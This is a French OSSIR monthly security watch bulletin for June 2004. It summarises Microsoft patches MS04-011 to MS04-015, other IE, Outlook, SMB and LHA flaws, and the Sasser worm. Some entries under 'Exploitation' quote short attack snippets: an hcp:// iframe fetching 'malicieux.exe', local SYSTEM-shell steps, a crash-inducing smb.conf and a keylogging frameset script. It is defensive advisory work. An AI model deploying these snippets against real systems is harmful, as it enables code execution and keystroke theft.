| Dernières
mises à jour
Ressources
XP SP2
Guides de sécurité
Outils
Avis de sécurité Windows
Accès à l'ancienne base
Site officiel de l'OSSIR
Forum (N/D)
Contact
Rechercher sur ce site :

Site réalisé, maintenu et hébergé par EdelWeb |
Veille OSSIR pour le mois de Juin
2004
Date de création : -
Dernière modification : -
1. Avis Microsoft
2. Autres avis
3. Nouveaux outils
4. Autres infos
Les faits marquants ce mois ci :
- L'énorme patch cumulatif MS04-011 et son lot de failles critiques
- La propagation du ver Sasser
| Alerte |
MS04-011 Patch cumulatif pour Windows |
| Référence |
Microsoft / Mai 2004 |
| Affecte |
Windows NT4, 2000, XP, 2003 |
| Type de problème |
14 failles ont été identifiées (!) :
- Débordement de buffer dans LSASS, exploitable à
distance
CAN-2003-0533
http://www.securityfocus.com/bid/10108
Source : Carlos Sarraute / Core Security Technologies, eEye
- Déni de service sur LDAP, exploitable à distance
CAN-2003-0663
http://www.securityfocus.com/bid/10114
- Débordement de buffer dans PCT (Private Communications
Transport, un module de la librairie SSL), exploitable à
distance sur tout module Windows utilisant SSL
CAN-2003-0719
http://www.securityfocus.com/bid/10116
Source : Internet Security Systems
- Débordement de buffer dans Winlogon, exploitable à
distance
CAN-2003-0806
http://www.securityfocus.com/bid/10126
Source : Ondrej Sevecek
- Débordement de buffer dans le gestionnaire de fichiers
Metafile (.EMF), exploitable par le biais d'une image incluse
dans une page Web, un email ou un document
CAN-2003-0906
http://www.securityfocus.com/bid/10120
Source : eEye
- Vulnérabilité dans le "Help and Support
Center", exploitable via une page Web ou un email contenant
un lien hcp:// pour injecter des scripts en zone poste de travail
CAN-2003-0907
http://www.securityfocus.com/bid/10119
Source : iDefense, Jouko Pynnönen
- Vulnérabilité dans l'"Utility Manager",
exploitable localement pour obtenir les droits SYSTEM
CAN-2003-0908
http://www.securityfocus.com/bid/10124
Source : Brett Moore / Security-Assessment, Cesar Cerrudo, Ben
Pryor
- Vulnérabilité dans le composant "Windows
Management", exploitable localement pour obtenir les droits
SYSTEM
CAN-2003-0909
http://www.securityfocus.com/bid/10125
Source : Erik Kamphuis / LogicaCMG (en partenariat avec les impôts
Hollandais)
- Vulnérabilité dans la gestion de la "Local
Descriptor Table" (LDT), exploitable localement pour lire
et écrire dans la mémoire du noyau (et obtenir les
droits SYSTEM)
CAN-2003-0910
http://www.securityfocus.com/bid/10122
Source : eEye
- Débordement de buffer dans le gestionnaire de protocole
H.323, exploitable à distance
CAN-2004-0117
http://www.securityfocus.com/bid/10111
- Vulnérabilité dans la "Virtual DOS Machine",
exploitable localement pour lire et écrire dans la mémoire
du noyau (et obtenir les droits SYSTEM)
CAN-2004-0118
http://www.securityfocus.com/bid/10117
Source : eEye
- Débordement de buffer dans la négociation SSP
(Security Support Provider), exploitable à distance
CAN-2004-0119
http://www.securityfocus.com/bid/10113
Source : NSFOCUS Security Team (http://www.nsfocus.com/english/homepage/research/0401.htm)
- Vulnérabilité SSL, exploitable à distance
CAN-2004-0120
http://www.securityfocus.com/bid/10115
Source : John Lampe / Tenable Network Security
- Vulnérabilité de type "double free"
dans le parseur ASN.1, exploitable à distance
CAN-2004-0123
http://www.securityfocus.com/bid/10118
Source : Foundstone, Qualys
|
| Exploitation |
Les failles 1, 3, 5, 6, 7, 9, 11, 12, 13 ont été
documentées en détail et peuvent faire l'objet d'une
exploitation active.
La faille n°1 est exploitée par le ver Sasser.
La faille n°7 est particulièrement simple à mettre
en oeuvre : sous Windows XP, appeller l'Utility Manager avec "Windows
+ U", faire "Aide", "Atteindre une URL",
"CMD.EXE" pour obtenir un shell SYSTEM.
|
| Avis de l'OSSIR |
Ce patch corrige de nombreuses
vulnérabilités critiques et devrait être appliqué
sur tous les postes et serveurs.
L'une de ces vulnérabilités est activement exploitée
par le ver Sasser.
Toutefois des effets de bord importants ont été mentionnés
dans les groupes de discussion sur Internet, il faut donc appliquer
ce correctif avec prudence. Il est regrettable que Microsoft ne
fournisse pas de correctif individuel pour chacune des vulnérabilités
identifiées, car toutes ne sont pas de même niveau. |
| Alerte |
MS04-012 Patch cumulatif pour RPC/DCOM |
| Référence |
Microsoft / Mai 2004 |
| Affecte |
Windows NT4, 2000, XP, 2003 |
| Type de problème |
4 nouvelles vulnérabilités impactant les protocoles
RPC et/ou DCOM ont été publiées :
- Déni de service via RPC, lorsque le patch MS03-039 est
installé
CAN-2003-0813
Source : eEye
- Déni de service sur RPCSS
CAN-2004-0116
http://www.securityfocus.com/bid/10127
Source : eEye
- Déni de service via RPC sur HTTP
CAN-2003-0807
http://www.securityfocus.com/bid/10123
Source : Qualys
- Divulgation d'information via un appel "Object Identity"
CAN-2004-0124
http://www.securityfocus.com/bid/10121
Source : Todd Sabin / BindView
|
| Exploitation |
Les failles 1 et 2 ont été documentées en
détail et peuvent faire l'objet d'une exploitation active. |
| Avis de l'OSSIR |
Il est recommandé d'appliquer ces patchs afin d'améliorer
la stabilité du système RPC/DCOM, (trop) rapidement
patché après la propagation du ver Blaster. |
| Alerte |
MS04-013 Patch cumulatif pour Outlook Express |
| Référence |
Microsoft / Avril 2004 |
| Affecte |
Outlook Express (toutes versions : Windows NT4, 2000, XP, 2003) |
| Type de problème |
Bogues récurrents dans le moteur MHTML d'Outlook Express,
exploités par exemple dans la série des "ms-its". |
| Exploitation |
Exécution de code en zone poste de travail via une page
Web ou un email malformé. |
| Avis de l'OSSIR |
Cette famille de bogues est sérieuse et facile à
exploiter. Elle est utilisée par de nombreux codes malveillants
(virus mais aussi spywares). Cette vulnérabilité peut
être activée par un lien "ms-its:", même
si le client par défaut n'est ni IE ni OE.
Il est fortement recommandé d'appliquer ce patch. |
| Alerte |
MS04-014 Vulnérabilité Jet |
| Référence |
Matt Thompson / Aberdeen IT + Microsoft / Avril 2004 |
| Affecte |
Moteur Jet 4.0, fourni en standard dans Windows NT4, 2000, XP,
2003.
|
| Type de problème |
Débordement de buffer dans le moteur de base de données
Jet.
CAN-2004-0197
http://www.securityfocus.com/bid/10112 |
| Exploitation |
Ce débordement de buffer est exploitable à distance,
par l'envoi d'une réponse malformée à un "broadcast"
Jet. Ces broadcasts sont émis lorsque le moteur Jet cherche
à se connecter à une base de données distante. |
| Avis de l'OSSIR |
Ce bogue est difficilement exploitable par un virus ou un ver,
car il n'est exploitable qu'en réponse à une action
du client sur le réseau local. |
| Alerte |
MS04-015 Vulnérabilité dans le Centre d'Aide et de
Support |
| Référence |
Morning Wood + Microsoft / Mai 2004 |
| Affecte |
Windows XP, 2003 |
| Type de problème |
Exécution de code dans le contexte de l'utilisateur via un
lien "hcp://". |
| Exploitation |
<iframe src="hcp://system/DVDUpgrd/dvdupgrd.htm?website=site.com/malicieux.exe"
width="1" height="1"></iframe>
|
| Avis de l'OSSIR |
La fonction "Centre d'Aide et du Support" a fait l'objet
de nombreux avis de sécurité. Elle est peu utilisée
et gagnerait à pouvoir être désactivée.
Cette vulnérabilité peut être exploitée
par un virus, il est donc recommandé d'appliquer le correctif.
L'impact sur les fonctionnalités du système sera limité,
car la fonction "Centre d'Aide et du Support" est de totue
façon peu usitée en entreprise. |
Mise à jour de bulletins
Avril 2004 :
- MS00-082, MS01-041, MS02-011, MS03-046 : disponibilité des
patches Exchange 5.0
Mai 2004 :
| Alerte |
4 bogues dans le moteur de décompression LHA |
| Référence |
CAN-2004-0234, CAN-2004-0235
Avril 2004 |
| Affecte |
Tout produit basé sur le moteur LHA public, en particulier
les outils antivirus. |
| Type de problème |
2 "buffer overflow" exploitables,
2 "directory traversal" permettant de sortir du chemin
de décompression d'origine. |
| Exploitation |
Des preuves de concept permettant d'exécuter du code lors
de l'utilisation de la commande LHA sous Linux ont été
publiés sur Internet. |
| Avis de l'OSSIR |
Le format de compression LHA n'est quasiment plus utilisé,
mais tous les outils antivirus le supporte.
Ces bogues sont graves, car ils permettent d'exécuter du
code conçu par l'attaquant lors du contrôle antivirus
d'une archive LHA soit sur le client final, soit sur la passerelle
de messagerie.
Tous les éditeurs affectés doivent mettre à
jour leurs produits. En attendant il est fortement recommandé
de détruire toute pièce jointe LHA avant
toute forme d'analyse antivirus. |
| Alerte |
Bogues IE multiples (non confirmés par BugTraq) |
| Référence |
- http://www.malware.com/shell.game.html
- http://www.acrossecurity.com/aspr/ASPR-2004-01-20-1-PUB.txt
- N/D
Tous publiés entre avril et mai 2004 |
| Affecte |
IE / OE / Explorateur Windows (versions non précisées,
par défaut 6.0) |
| Type de problème |
- Cross-zone scripting
- Déni de service IE/OE/Outlook
- IE permet d'imprimer sans confirmation :-)
|
| Exploitation |
- <a href="shell:Cache">
- http://<hostname>%00%00
- window.print()
|
| Avis de l'OSSIR |
Il devient difficile de suivre les vulnérabilités
IE/OE/Outlook ... |
| Alerte |
Débordement de buffer dans le traitement des noms SMB longs |
| Référence |
http://www.securityfocus.com/bid/10213 |
| Affecte |
Windows NT4, 2000, XP |
| Type de problème |
Débordement de buffer exploitable lorsque le client Windows
essaie de se connecter à un serveur SMB avec des noms de
répertoire arbitrairement longs.
(Ce bogue ne peut être exploité que si le serveur
distant autorise les noms de répertoire arbitrairement longs,
ce qui est le cas de Samba). |
| Exploitation |
Créer le fichier smb.conf suivant :
[AAA...AAAA]
comment = bug
path = /tmp/testfolder
public = yes
writable = yes
printable = no
browseable = yes
write list = @trymywingchung |
| Avis de l'OSSIR |
Ce bogue n'est pas exploitable par un virus ou un ver, il ne
peut être utilisé que sur un LAN dans le cas d'une
intrusion manuelle ciblée. |
| Alerte |
Bogue ISAPI générique |
| Référence |
http://www.securityfocus.com/bid/9963 |
| Affecte |
Tout filtre ISAPI compilé avec Visual Studio 6 + MFC |
| Type de problème |
Déni de service |
| Exploitation |
Par envoi massif de commandes POST, il est possible de provoquer
le crash du filtre et donc du serveur Web IIS. |
| Avis de l'OSSIR |
Bien qu'anecdotique en termes d'exploitation "grandeur nature",
ce bogue est un cas d'école en ce qui concerne les risques
liés aux bibliothèques partagées, a fortiori
lorsque celles-ci proviennent du compilateur ! |
| Alerte |
Cross-site scripting dans SharePoint |
| Référence |
http://www.securityfocus.com/bid/10043 |
| Affecte |
SharePoint Portal 2001 pre-SP3 |
| Type de problème |
Cross-site scripting |
| Exploitation |
N/D |
| Avis de l'OSSIR |
Malgré leur simplicité de détection, les
bogues de cross-site scripting ne sont pas en voie d'exctinction
... |
| Alerte |
Divulgation d'information via une requête GET malformée |
| Référence |
http://www.securityfocus.com/bid/10292 |
| Affecte |
ASP.NET |
| Type de problème |
Divulgation d'information dans les messages d'erreur. |
| Exploitation |
N/D |
| Avis de l'OSSIR |
En l'absence de détails techniques, cette faille est difficilement
qualifiable.
De manière générale il est souhaitable d'utiliser
un Reverse Proxy et de filtrer en sortie les messages d'erreur,
surtout lorsque ceux-ci contiennent des mots clés de type
"C:\". |
| Alerte |
Emplacement du cache des images prédictible |
| Référence |
http://www.securityfocus.com/bid/10307 |
| Affecte |
Outlook 2003 |
| Type de problème |
Emplacement du cache prédictible : en combinant cette vulnérabilité
avec une vulnérabilité d'exécution locale (de
type MS-ITS), il est possible d'exécuter un script dans la
zone poste de travail via un email malveillant. |
| Exploitation |
<img src="malware.htm" style="display:none">
: charge "malware.htm" dans un répertoire prédictible. |
| Avis de l'OSSIR |
Cette faille en soi n'est pas dangereuse, mais la possibilité
pour l'attaquant de télécharger des scripts à
un emplacement prédictible est un prérequis à
l'exploitation de beaucoup de failles IE/OE/Outlook. |
| Alerte |
Possibilité de "webbug" malgré les protections
natives |
| Référence |
http://www.securityfocus.com/bid/10323 |
| Affecte |
Outlook 2003 |
| Type de problème |
Fuite d'information.
Outlook 2003 possède une option (activée par défaut)
permettant d'interdire le chargement des éléments
externes au message (images liées). Cette technique est souvent
utilisée par les spammeurs pour confirmer la lecture d'un
message. |
| Exploitation |
<v:vml frame style="LEFT: 50px; WIDTH: 300px; POSITION:
relative; TOP: 30px; HEIGHT: 200px" src = "http://www.example.com/duh.txt#malware"></v:vmlframe>
<HTML><HEAD>
<STYLE>v\:* { behavior: url(#default#VML); } </STYLE>
<XML:NAMESPACE NS="urn:schemas-microsoft-com:vml" PREFIX="v"/>
</HEAD></HTML>
|
| Avis de l'OSSIR |
N/D |
| Alerte |
Masquage d'URL dans les clients de messagerie |
| Référence |
http://www.securityfocus.com/bid/10324 |
| Affecte |
Outlook (toutes versions) + autres clients (non mentionnés
ici) |
| Type de problème |
Masquage du lien cible. |
| Exploitation |
http://drs.yahoo.com/example.com/NEWS/*http://slashdot.org/#http://drs.yahoo.com/www.example.com/NEWS |
| Avis de l'OSSIR |
N/D |
| Alerte |
Inclusion directe du fichier ZIP dans le message |
| Référence |
Malware / Mai 2004 |
| Affecte |
Outlook (versions non précisées) |
| Type de problème |
Le contenu du message lui-même est un fichier ZIP (il n'y
a pas de pièce jointe). |
| Exploitation |
http://www.malware.com/eml.zip
MIME-Version: 1.0
Content-Type: application/x-zip-compressed
Content-Transfer-Encoding: binary
X-Source: 06.03.04 http://www.malware.com
PK… |
| Avis de l'OSSIR |
Cette faille en soi n'est pas dangereuse, sauf si l'environnement
d'exécution du client souffre d'un bogue permettant d'exécuter
directement le contenu d'un fichier ZIP ou que le client lui-même
est victime d'un tel bogue ... |
| Alerte |
Cross-site scripting par modification du focus |
| Référence |
iDefense / Mai 2004 |
| Affecte |
IE (versions non précisées) |
| Type de problème |
Le contenu du message lui-même est un fichier ZIP (il n'y
a pas de pièce jointe). |
| Exploitation |
<html><head><script>
var keylog=''; document.onkeypress = function ()
{ k = window.event.keyCode; window.status = keylog += String.fromCharCode(k)
+ '[' + k +']'; }
</script></head>
<frameset onLoad="this.focus();" onBlur="this.focus();"
cols="100%,*">
<frame src="http://www.idefense.com/register.jsp" scrolling="auto">
</frameset></html>
|
| Avis de l'OSSIR |
N/D |
http://www.microsoft.com/downloads/details.aspx?FamilyID=f87cf701-4e68-4e9e-ade5-59d4d40d8e23&DisplayLang=en
- Une implémentation de SUID sous Windows, par les créateurs
de SecureEXE, SecureNT, SecureStack
http://www.neovalens.com/
- Propagation du ver Sasser
Ver "classique" : se connecte sur le port TCP/445, exploite
la faille LSA MS04-011, récupère le code viral par FTP,
ouvre une backdoor. Il connait pourtant un grand succès : AFP (plusieurs
heures d'interruption), commission européenne (1 000 PC infectés),
poste taiwanaise (1 600 PC), poste allemande (300 000 PC), gardes côtes
anglais.
Remarque : le code du ver est bogué - il contient un "buffer
overflow" exploitable :-)
Son auteur présumé a été arrêté
sur dénonciation (suite à la prime de 250,000$ promise par
Microsoft), il s'agirait d'un allemand de 18 ans (Sven Jaschan).
http://www.microsoft.com/presspass/press/2004/may04/05-08SasserTelePR.asp
Il pourrait également être à l'origine du virus NetSky.
http://news.bbc.co.uk/1/hi/world/europe/3695857.stm
Le ver Sasser-E, identifié 3h45 après l'arrestation, est
un "gentil" ver qui prévient l'utilisateur de la faille.
- L'auteur du virus Agobot / Phatbot aurait été arrêté,
il s'agirait d'un allemand de 21 ans.
- Le point sur les avancées en matière de sécurité
(par Bill Gates) - en Français
http://www.microsoft.com/france/apropos/entreprise/bulletins/20040331-security-fr.asp
- Accord amiable Sun / Microsoft signé le 2 avril 2004
http://www.microsoft.com/france/cp/2004/4/info.asp?mar=/france/cp/2004/4/02040401_a56.html
- Site "anti spyware" de Microsoft
http://www.microsoft.com/security/articles/spyware.asp
- Article Microsoft : "I Got Hacked, What Do I Do ?"
http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx
- "Users who have expired passwords can still log on to the domain
if the FQDN is exactly eight characters long in Windows 2000"
http://support.microsoft.com/?id=830847
- Adoption de la loi sur l'Économie Numérique (LEN) en
bonne voie …
|